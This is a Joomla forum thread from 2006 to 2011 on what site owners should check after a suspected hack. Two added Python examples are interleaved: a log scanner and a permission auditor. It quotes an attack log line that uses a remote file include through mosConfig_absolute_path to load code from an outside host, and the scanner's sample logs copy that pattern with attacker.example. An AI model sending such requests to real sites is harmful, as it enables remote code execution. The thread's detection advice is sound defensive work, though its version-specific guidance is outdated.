You think your site got hacked? Read this first, please!!!



Post by Hackwar » Tue Apr 11, 2006 9:00 pm

Please go directly to the next two posts
http://forum.joomla.org/viewtopic.php?p ... 6#p2661596
and
http://forum.joomla.org/viewtopic.php?p ... 8#p2661598

This first post may contain outdated links and removed content references.

Hi,
you think you have been hacked? We will try to give you some help on how to proceed further.

Please note that this thread is locked, it can be discussed here.

First we have to gather some information:
  • What version of Joomla do you have?
  • What version of PHP/MySQL/Apache do you have?
  • What kind of hosting do you have?
  • Do you have access to the access logs of the server?
  • Which third party extensions do you have installed? (Components, modules, plugins/mambots)
  • What information do you have from your provider? Did they send you anything in addition?
  • Do you have a backup?
  • Have you checked the folder permissions?
  • Have you really been hacked?

What version of Joomla do you have?
There are currently no known vulnerabilities in Joomla 1.0.11! If you have a version prior to this, please update as soon as possible. Prior versions of Joomla have some serious vulnerabilities, which sometimes can lead to a complete loss of your server!

What version of PHP/MySQL/Apache do you have?
PHP 4.3 had some reported bugs and vulnerabilities and you should consider upgrading to a newer version (4.4.x will be fine). In general you should not use versions of PHP and MySQL that are older than the 4.x versions. If you plan to upgrade to Joomla 1.5 later, you should consider updating to at least PHP 4.4.x and MySQL 4.1.13, since these versions are the minimum requirement for native UTF-8 support. (Joomla 1.5 will work with older versions though.)
In general, you should use the latest versions of the used software to prevent any vulnerabilities from this side.

What kind of hosting do you have?
There are several kinds of hosting and only a few provide a single server for you alone. If you don't have a server for your site(s) alone, you have a shared hosting environment. Sometimes your account can get hacked via accounts for other sites on that server. This is a configuration error by your provider and can be prevented, but not all providers are so thorough. If you find out that your account has been hacked via another user's account, contact your provider and demand that they correct their configuration to prevent this in the future. If they do not respond positively, you should think about changing your provider.

Do you have access to the access logs of the server?
If Joomla was the target for the attack, we need to know how. Most servers have access logs that can give more information in that regard and save the used URL.
There was a problem with code/SQL injection in Joomla 1.0.3. URLs like these point to a hack attempt:
xxx.xxx.xxx.xxx - - [01/Apr/2006:12:00:00 0000] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://medenin.me.funpic.de/cmd.txt?&cm ... google.txt? HTTP/1.0" 200 167 "-" "Mozilla/5.0"
If you see URLs like that or your provider suspends your account because of URLs of this kind, make sure you have the latest Joomla installed. The current version is not vulnerable to these kinds of attack. All core code uses a function that filters all input variables for SQL or code injections. However, this is not always the case for third party extensions! Some of them are potentially vulnerable to code injection because of poor coding practice.

Which third party extensions do you have installed? (Components, modules, plugins/mambots)
The Joomla core itself is very secure, but some extensions, especially those coded fast and nasty, are vulnerable to certain attacks. Bigger and established extensions like Community Builder or Joom!fish are thoroughly tested and use the proposed coding techniques. If you are not a coder and can't look for this yourself, look for reviews by other people in the forum. If you want to check this yourself, look here. (This article has been written for Joomla 1.5, but the code is somewhat similar to the Joomla 1.0.x series.)
In the last few months, a lot of insecure extensions have been discovered. A list of those can be found here.

Which informations do you have from your provider? Did they send you something in addition?
If you have been informed by your provider that you have been hacked, they should give you a reason how they have noticed that and what they can tell you besides that. Information from their side is often the most important part.

Do you have a backup?
If you have a backup, save the current files of your webserver and make a dump from your database to save evidence. This way the core can investigate this further without any additional downtime from your page.
If you don't have a backup, save all images of your page and make a dump from your database. After that, erase EVERYTHING! You can't be sure that there is no file of the hacker left in some very deep folder of your installation that could help him gain control again. Yes, you may have needed a lot of time to customize your page, but the risk is too high.

Have you checked the folder permissions?
A webserver has a sophisticated system to control the read, write and execute permissions of its files. If you give too much access to your folders, your server gets vulnerable and can be hacked easily. That's why you shouldn't give more than the standard 755 for folders and 644 for files. This is a number combination that represents a certain kind of read/write access. Basically you give full access to the owner of the file and only restricted access to others. The ownership is another problem and both are well discussed in the forum.

Have you really been hacked?
This is a question you should really consider. Have I been hacked? Have I ruled out every other option? Some providers make changes on their system without informing you, or your server had a hardware failure, which is the reason why it is not responding like normal. Also, have you perhaps misconfigured your page? Have you changed the database password and forgotten to change it in Joomla? Please take all this into consideration!

I have checked all this, what can I do now?
Ok, you have collected all the files, you are sure that it's Joomla and not your or your provider's configuration that has caused the hacker to gain access to your server, and you also have eliminated all third party extensions as the source of the vulnerability. Now wrap all that information up in a nice mail and send it to security [at] joomla [dot] org. With this mailing list you reach the developers and they will investigate this further.

Please be sure that your request is valid. If you send a non-valid request to the core team, they will have to waste time on this, and if too many people do this, the core has to stop this service.
They are trying to help you and the other users, but if they are swamped with requests or non-security related topics, they don't have enough time for all requests or they won't be able to review them as thoroughly.

Ok, I have informed the core and I have restored my server. What should I do next?
First of all: Change all passwords. No matter what kind of password it was, change them all. Also, change all passwords of your Joomla users that are higher than "Registered". It will not help if you changed all your passwords but the super-admin account of your colleague still has the same old password that the hacker could crack. (The passwords are hashed with the MD5 algorithm and should not be able to be decoded. However, the algorithm has been cracked and if you know the hash code, you can calculate a password with the same hash. In Joomla 1.5 you can choose between different coding formats.)

One last thing: When you reinstall Joomla, you don't have to make all folders writable. In general, you only need the images and media folders to be set to that. All other folders only need to be writable when you want to install an extension. Keeping them non-writable will greatly improve your security!

After that, you can continuously check your files. For this you can use the tool mentioned here. Further, check the folder permissions and file ownership. You should search for this one on the forum. There are numerous posts about this and about as many solutions.

Whatever your problem is, we feel with you and hope it turns out well for you!
Last edited by mandville on Fri Nov 04, 2011 5:10 pm, edited 2 times in total.
Reason: Due to changes in the links in this post, and as a lot of the information is relevant, this post will remain
god doesn't play dice with the universe. not after that drunken night with the devil where he lost classical mechanics in a game of craps.

Since the creation of the Internet, the Earth's rotation has been fueled, primarily, by the collective spinning of English teachers in their graves.
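The post above says to look in the access logs for requests that try to set `_REQUEST[...]`, `GLOBALS` or `mosConfig_absolute_path` from the client. As an added example (not from the forum post and not Joomla project code), this Python script parses Apache combined-format log lines, URL-decodes the query string so percent-encoded variants are not missed, and reports which of those indicators each request carries. The log lines and the host `attacker.example` are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample Apache combined-format log lines (no real hosts).
# Line 2 mirrors the shape of the request quoted in the post; line 3 is the
# same idea with the remote URL percent-encoded, which a plain grep misses.
SAMPLE_LOG = """\
10.0.0.1 - - [01/Apr/2006:12:00:00 +0000] "GET /index.php?option=com_content&task=view&id=5&Itemid=1 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.0.0.2 - - [01/Apr/2006:12:00:01 +0000] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://attacker.example/cmd.txt? HTTP/1.0" 200 167 "-" "Mozilla/5.0"
10.0.0.3 - - [01/Apr/2006:12:00:02 +0000] "GET /index.php?option=com_example&mosConfig_absolute_path=http%3A%2F%2Fattacker.example%2Fc.txt%3F HTTP/1.0" 200 167 "-" "-"
10.0.0.4 - - [01/Apr/2006:12:00:03 +0000] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"
"""

# client_ip, ident, user, [time], "METHOD path protocol", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify_request(request_path):
    """Return the sorted list of indicators found in one request path.
    request_override: client tries to set _REQUEST[...] or GLOBALS directly
    config_override:  client supplies a mosConfig_* setting in the query
    remote_include:   that setting carries a remote URL (file include)"""
    indicators = set()
    query = urlsplit(request_path).query
    # parse_qsl percent-decodes keys and values for us
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.startswith("_REQUEST[") or key == "GLOBALS":
            indicators.add("request_override")
        if key.startswith("mosConfig_"):
            indicators.add("config_override")
            if value.lower().startswith(("http://", "https://", "ftp://")):
                indicators.add("remote_include")
    return sorted(indicators)

def scan_log(log_text):
    """Parse each log line and return one dict per suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; ignore it
        ip, when, method, path, status = m.groups()
        indicators = classify_request(path)
        if indicators:
            hits.append({"ip": ip, "time": when, "method": method,
                         "status": int(status), "indicators": indicators})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["status"], ", ".join(hit["indicators"]))
```

A 200 status on such a request only says the front controller answered; whether the include actually succeeded has to be confirmed from the files on disk, as the post goes on to describe.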

Re: You think your site got hacked? Read this first, please!!!

Post by mandville » Fri Nov 04, 2011 5:03 pm

It would help us to help you if, before you post your security/been-hacked topic, you tell us whether you have done the following. Try copy and paste to use this as a posting guide if needed.

[ ] Did you use the forum http://forum.joomla.org/search.php search box for a similar error?

[ ] Run the Forum Post Assistant / FPA Instructions available here and are also included in the download package.

[ ] Ensure you have the latest version of Joomla. Delete all files in your Joomla installation. Replace the deleted files with fresh copies of a current full version of Joomla, and fresh copies of extensions and templates used. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in files and directories

[ ] Review Vulnerable Extensions List

[ ] Review and action Security Checklist checklist 7 to make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc.

[ ] Change all passwords and if possible user names for the website host control panel and your Joomla site.

[ ] Use proper permissions on files and directories. They should never be 777, but ideal is 644 and 755.

[ ] Check your htaccess for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled.

Note: The forum post tool will work with J1.0.x, J1.6.x, J1.7.x
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
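The checklist above asks for 644 on files and 755 on directories and never 777. As an added example (not from the forum post and not Joomla project code), this Python script walks a site root and lists every file or directory whose mode grants more than that standard, so the loose entries can be found and corrected. The `build_sample_tree` layout is constructed for the example and is audited inside a temporary directory.

```python
import os
import stat
import tempfile

FILE_MAX = 0o644  # rw-r--r--  the standard the checklist asks for
DIR_MAX = 0o755   # rwxr-xr-x

def excess_bits(mode, allowed):
    """Permission bits present in `mode` that `allowed` does not grant."""
    return (mode & 0o7777) & ~allowed

def audit_permissions(root):
    """Return sorted [(relative_path, mode, allowed)] for every directory
    looser than 755 and every regular file looser than 644 under `root`.
    Symlinks are skipped; setuid/setgid/sticky bits count as excess too."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        entries = [(dirpath, DIR_MAX)]  # os.walk visits each directory once
        entries += [(os.path.join(dirpath, f), FILE_MAX) for f in filenames]
        for path, allowed in entries:
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            mode = stat.S_IMODE(st.st_mode)
            if excess_bits(mode, allowed):
                findings.append((os.path.relpath(path, root), mode, allowed))
    return sorted(findings)

def build_sample_tree(base):
    """Constructed Joomla-like layout: two sane entries, three too loose."""
    layout = {"configuration.php": 0o644, "images/logo.png": 0o666,
              "tmp/upload.php": 0o755, "cache/.keep": 0o644}
    for rel, mode in layout.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()
        os.chmod(path, mode)
    os.chmod(os.path.join(base, "images"), 0o777)  # the classic 777 mistake
    os.chmod(os.path.join(base, "tmp"), 0o755)
    os.chmod(os.path.join(base, "cache"), 0o755)

def demo():
    """Build the sample tree in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as base:
        build_sample_tree(base)
        return audit_permissions(base)

if __name__ == "__main__":
    for rel, mode, allowed in demo():
        print(f"{rel}: {oct(mode)} (expected at most {oct(allowed)})")
```

Point `audit_permissions` at a real site root to get the list of entries to chmod back to 644/755; the images and media folders the first post mentions will show up only if they are looser than that.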


Re: You think your site got hacked? Read this first, please!!!

Post by mandville » Fri Nov 04, 2011 5:05 pm

General Information on the FPA Script:

The Forum Post Assistant has been designed to assist forum posters to be able to post relevant system, instance, php and troubleshooting information directly in to a pre-formatted forum post. This should save a few hours of posting back and forth, asking for, and explaining how to acquire useful information in order for other forum users to help troubleshoot a problem.
This process also means that consistent information is gathered and presented in every case, enabling helpers to quickly target information relevant to the specific problem observed by the user.

USE AT YOUR OWN RISK. Accuracy and completeness of this script and documentation are not assured and no responsibility will be accepted for any damage, issues or confusion caused by using any FPA versions contained within these branches.

Discussion topic on the FPA tool is at: http://forum.joomla.org/viewtopic.php?f=621&t=656394 Report any issues there.

Download:
Use these links to download the FPA:
Download .tar.gz version or Download the .zip version


Compatibility:
PHP 4.1, PHP 4, 5, 6DEV; MySQL 3.2 - 5.5; MySQLi from 4.1 (@ >= PHP 4.4.9)

Joomla! Version Support:
- v 1.0.x
- v 1.5.x
- v 1.6.x
- v 1.7.x

Known Issues:
FPA is not currently fully compatible with Joomla websites that have had their configuration.php file moved outside of the public_html directory.

Installation:
1. Download the desired archive
2. Uncompress the downloaded package file on your own computer (using WinZip or another decompression tool).
3. READ the included README file for any special Release notes.
4. READ the included Documentation file for detailed usage instructions.
5. Upload the fpa-en.php script to your Joomla! Site Root "/" directory. This is the place you installed Joomla and may not be the main root for your server. See examples below.
6. Run the script through your browser by entering: http:// mysite.com/fpa-en.php. See examples below.

Installation Examples:
Joomla! is installed in your web-root folder:
Upload the fpa-en.php script to: <your-domain-name.com>/public_html/
To run the script: http:// mysite.com/public_html/fpa-en.php

Joomla! is installed in a sub-directory named "cms":
Upload the fpa-en.php script to: <your-domain-name.com>/public_html/cms/
To run the script: http:// mysite.com/public_html/cms/fpa-en.php

Usage:
When called from your browser, the Forum Post Assistant will run and display information it has gathered about your site and the server environment your site is installed on. You may use the information displayed by the FPA to assist in troubleshooting your site.
[Screenshot: fpa1.jpg]
Using the FPA to make a post to a Security forum topic:

Click on the “Show the Forum Post Assistant” link to open the Post Tool for generating the code you will paste into your forum post.
[Screenshot: fpa6.jpg]

Enter a brief description of your problem, any error messages you see, and a brief description of any actions you have taken to resolve the issue (optional). You may leave this information blank if desired, but providing what you can will usually help figure out the issue. Security options are best left at their default for posting in the forum.
[Screenshot: fpa2.jpg]
Select run time options detail level for the report and select the Information Privacy Level of the report (optional). You may leave this information at the defaults if desired, but providing additional information about installed extensions can usually help figure out the issue.
[Screenshot: fpa3.jpg]
Generating the Post:
Click the “Click Here To Generate Post” button to build the post content using the information and options you selected above.
Click the “Reset” button to reset to defaults the information and options selections displayed in Figures 1 and 2.
If you get an “Out of Memory” or “Execution Time Error” when generating the post information, then select the Seeing PHP "Out of Memory" or "Execution Time" Errors? check box to temporarily increase PHP memory and execution times and try generating the post again.
[Screenshot: fpa4.jpg]
Copying the Generated Information:
Place your computer cursor into the Post Detail box. It does not matter where within the code the cursor is.
Select All of the content by using the key combination CTRL – A to select all of the code within the box.
Copy the contents selected to your computers clipboard by using the key combination CTRL – C
[Screenshot: fpa5.jpg]
Inserting the information into a New Forum Posting:

If you have not made a posting in the appropriate Joomla security forum for your version of Joomla about your security issue, then take the steps below:
* Click on the “New Topic” button.
* Enter a descriptive subject for your topic. Avoid the phrase I was hacked!
* In the message body, enter any additional information you think may be helpful in assisting with the issue you're having. Do Not post any direct links to infected sites, assumed nationality, hacker links or hacker names you found displaying on your site.
* Paste the information from the FPA into the message body area using the CTRL – V keyboard command. The correct forum format codes are already included in the post generation so there is no additional formatting needed of the generated code.
* If you need to add pictures for clarity, use the attachment upload section of the forum post editor to add them now.
* If you wish to preview the message before posting it, then click the “Preview” button below the message body area.
* When satisfied with your message, click the “Submit” button that is below the message body area.

Inserting the information into an Existing Forum Thread:

* At the bottom of an existing forum thread there is a “Quick Reply” message body area. You may use that to post the FPA information into your existing forum thread.
* In the message body area, enter any additional information you think may be helpful in assisting with the issue you're having. Do Not post any direct links to infected sites, assumed nationality, hacker links or hacker names you found displaying on your site.
* Paste the information from the FPA into the message body area using the CTRL – V keyboard command. The correct forum format codes are already included in the post generation so there is no additional formatting needed of the generated code.
* When satisfied with your message, click the “Submit” button that is below the message body area.
* If you wish to preview the message before posting it or prefer working in the full forum message editor, then click the “Full Editor” button below the message body area. Use the “Full Editor” if you need to add pictures for clarity!
[Screenshot: fpa7.jpg]

Discussion topic on the FPA tool is at: http://forum.joomla.org/viewtopic.php?f=621&t=656394 Post any questions on the use of the FPA, bugs, and suggestions there.